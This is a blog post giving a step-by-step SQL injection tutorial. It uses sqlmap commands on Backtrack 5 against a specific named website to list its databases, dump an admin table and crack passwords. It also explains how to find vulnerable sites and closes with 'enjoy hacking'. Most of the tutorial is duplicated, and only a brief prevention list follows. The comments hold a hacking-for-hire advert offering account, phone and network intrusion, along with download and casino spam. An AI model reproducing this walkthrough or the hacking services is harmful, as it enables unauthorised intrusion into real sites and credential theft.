HACKING A WEBSITE
what is sql Injection?
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
How does it cause Vernerabilites?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading data or even changing data that they shouldn't be allowed to do.
How to Use it in Backtrack?
1) open a terminal in backtrack 5
2) type cd /pentest/database/sqlmap
3) then type this python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 its the website that we are to going to hack
5) id=9 is vernurable that is its easy to hack
6) [*] information_schema
[*] us_mappn
these are the 2 avilable database in the website
7) then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) leave information_schema its the database that will be available for all website
10) then finding system admin file
11) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) we already found admin file now we are getting the info of admin file
13) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) then using common default dictionary method we are cracking the password
15) now the user id and the password has been cracked
now
how to find vernurable web sites
go to this http://mappn.com/game.php?id=9 put (')
mappn.com/game.php?id=9' now press enter
nw see sql error will occur now this is vernurable
thank you and enjoy hacking
who to prevent sql attack?
what is sql Injection?
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database.
In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.
How does it cause Vernerabilites?
It can lead to vulnerabilities because attackers can send values to an application that they know will be interpolated into a SQL string. By being very clever, they can manipulate the result of queries, reading data or even changing data that they shouldn't be allowed to do.
How to Use it in Backtrack?
1. Open Terminal and go to sqlmap Dir:
- cd /pentest/web/scanners/sqlmap/
2. To use it type :
-python sqlmap.py -u http://Target.com/index.php?id=1 --dbs ( For database )
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) --table
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) --colum
-python sqlmap.py -u http://Target.com/index.php?id=1 -D (databasename) -T (tablename) -C (columname) --dump
1) open a terminal in backtrack 5
2) type cd /pentest/database/sqlmap
3) then type this python sqlmap.py -u http://mappn.com/game.php?id=9 --dbs
4) http://mappn.com/game.php?id=9 its the website that we are to going to hack
5) id=9 is vernurable that is its easy to hack
6) [*] information_schema
[*] us_mappn
these are the 2 avilable database in the website
7) then search for tables and columns
8) python sqlmap.py -u http://mappn.com/game.php?id=9 -D (database name) --tables
9) leave information_schema its the database that will be available for all website
10) then finding system admin file
11) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin --columns
12) we already found admin file now we are getting the info of admin file
13) then type python sqlmap.py -u http://mappn.com/game.php?id=9 -T _sys_admin -U test --dump
14) then using common default dictionary method we are cracking the password
15) now the user id and the password has been cracked
now
how to find vernurable web sites
go to this http://mappn.com/game.php?id=9 put (')
mappn.com/game.php?id=9' now press enter
nw see sql error will occur now this is vernurable
thank you and enjoy hacking
who to prevent sql attack?
- Strict type checking ( Don’t trust what the user enters )
- If you expect user name to be entered, then validate whether it contains only alpha numerals.
- Escape or filter the special characters and user inputs.
- Use prepared statements to execute the queries.
- Don’t allow multiple queries to be executed on a single statement.
- Don’t leak the database information to the end user by displaying the “syntax errors”, etc..
Super
ReplyDeleteNeed The To Hire A Hacker❓ Then contact PYTHONAX✅
DeleteThe really amazing deal about contacting PYTHONAX is that the Hack done by us can’t get traced to you, as every Hacking job we do is strongly protected by our Firewall. It’s like saying if anyone tries to trace the Hack, it will lead them to us and we block whatever actions they are doing.
We have been Invisible to Authorities for almost a decade now and if you google PYTHONAX, not really about us comes out, you can only see comments made by us or about us.
Another Amazing thing to you benefit from Hiring our Hackers is that you get a Legit and the best Hacking service, As we provide you with Professional Hackers who have their Hacking Areas of specialization.
We perform every Hack there is, using special Hacking tools we get from the dark web.
Some list of Hacking Services we provide are-:
▪️Phone Hacking & Cloning ✅
▪️Computer Hacking ✅
▪️Emails & Social Media Account Hacking✅
▪️Recovering Deleted Files✅
▪️Tracking & Finding People ✅
▪️Hunting Down Scammers✅
▪️Hack detecting ✅
▪️Stealing/Copying Files & Documents From Restricted Networks and Servers ✅
▪️Bitcoin Multiplication✅
▪️Binary Option Money Recovery ✅
▪️Forex Trading Money Recovery✅
▪️IQ Option Money Recovery✅
And lots more......
Whatever Hacking service you require, just give us an Email to the Emails Address provided below.
pythonaxhacks@gmail.com
pythonaxservices@gmail.com
PYTHONAX.
2020 © All Right Reserved.
Hacking A Website Using Sql - Facebook Hacking Tricks >>>>> Download Now
Delete>>>>> Download Full
Hacking A Website Using Sql - Facebook Hacking Tricks >>>>> Download LINK
>>>>> Download Now
Hacking A Website Using Sql - Facebook Hacking Tricks >>>>> Download Full
>>>>> Download LINK li
Τhese arе aсtually wonԁerful iԁeas
ReplyDeletein cοncerning blogging. You have
touched some pleаsant things here. Any way keep up wrіnting.
Loοκ at my ωеb page ::
coltoneagles.com
This comment has been removed by a blog administrator.
ReplyDeleteHarrah's Casino, Reno Hotel and Spa - Mapyro
ReplyDeleteSearch for Harrah's 강릉 출장안마 Casino, Reno Hotel and Spa in Reno, NV, United 김포 출장샵 States - Find reviews and discounts 상주 출장안마 for AAA/AARP members, 속초 출장마사지 seniors, Rating: 4.5 · 30 reviews 대구광역 출장마사지